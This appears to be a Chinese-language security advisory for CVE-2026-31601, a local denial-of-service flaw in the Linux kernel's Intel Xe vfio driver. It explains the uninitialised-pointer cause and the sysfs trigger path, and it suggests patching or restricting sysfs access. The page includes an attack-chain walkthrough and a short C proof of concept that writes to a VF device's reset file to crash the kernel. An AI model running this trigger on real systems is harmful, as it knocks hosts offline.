CVE-2026-31601 CVSS 5.5 中危

CVE-2026-31601 Linux内核vfio/xe驱动拒绝服务漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31601

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的vfio/xe驱动程序存在一个安全漏洞。当尝试在不支持迁移功能的VF（虚拟功能）设备上执行重置操作时，会触发内核页错误，导致系统崩溃。该问题的根本原因在于代码初始化逻辑存在耦合，处理重置所需的`xe_vfio_pci_core_device`成员仅在迁移初始化时被赋值，导致在非迁移场景下访问未初始化内存。本地低权限攻击者可利用此漏洞造成系统拒绝服务。

技术细节

该漏洞源于Linux内核中Intel Xe显卡驱动的VFIO实现逻辑缺陷。在`xe_vfio_pci`模块中，设备重置函数`xe_vfio_pci_reset_done`依赖于`xe_sriov_vfio_wait_flr_done`来等待FLR（功能级别重置）完成。然而，负责处理重置的关键数据结构成员仅在迁移功能初始化时才被正确分配。当攻击者对不支持SR-IOV迁移的VF设备触发重置时，内核尝试访问一个未初始化的指针（RDI寄存器为0，偏移0x11f8），导致“Unable to handle page fault”的内核恐慌。调用栈显示问题发生在`sysfs`写入接口`reset_store`，意味着通过sysfs文件系统即可触发。修复方案通过重构代码，将VF设备的初始化与迁移初始化解耦，确保即使未启用迁移，重置所需的数据也已准备就绪。

攻击链分析

STEP 1

获取本地访问权限

攻击者获得本地低权限用户账户（PR:L）。

STEP 2

定位目标设备

识别系统中使用Intel Xe驱动且不支持迁移的VF设备。

STEP 3

触发重置操作

向目标设备的sysfs reset接口（如/sys/bus/pci/devices/.../reset）写入'1'。

STEP 4

执行漏洞代码

内核调用reset_store -> xe_vfio_pci_reset_done -> xe_sriov_vfio_wait_flr_done。

STEP 5

系统崩溃

由于未初始化的结构体成员导致空指针解引用，触发内核Oops，系统可用性丧失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-31601
// Trigger kernel panic by resetting a VF device that does not support migration.
// Requires local access and a susceptible Intel Xe device.

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int main() {
    // Replace with actual device path, e.g., /sys/bus/pci/devices/0000:03:00.1/reset
    // This path typically corresponds to the Virtual Function (VF) of an Xe device.
    const char *reset_path = "/sys/bus/pci/devices/XXXX:XX:XX.X/reset";
    int fd;
    const char *trigger = "1";

    printf("[*] Attempting to trigger CVE-2026-31601...\n");
    printf("[*] Target: %s\n", reset_path);

    fd = open(reset_path, O_WRONLY);
    if (fd < 0) {
        perror("[-] Failed to open reset file");
        return 1;
    }

    // Write to the reset file to trigger the function reset_store
    // which calls xe_vfio_pci_reset_done and leads to the page fault.
    if (write(fd, trigger, strlen(trigger)) < 0) {
        perror("[-] Failed to write to reset file");
    } else {
        printf("[+] Trigger sent. If vulnerable, kernel panic should occur.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (特定支持Xe驱动的版本)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁，该补丁通过重构初始化代码解耦了重置与迁移逻辑。若无法立即升级，应严格限制本地用户对PCI设备sysfs接口的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表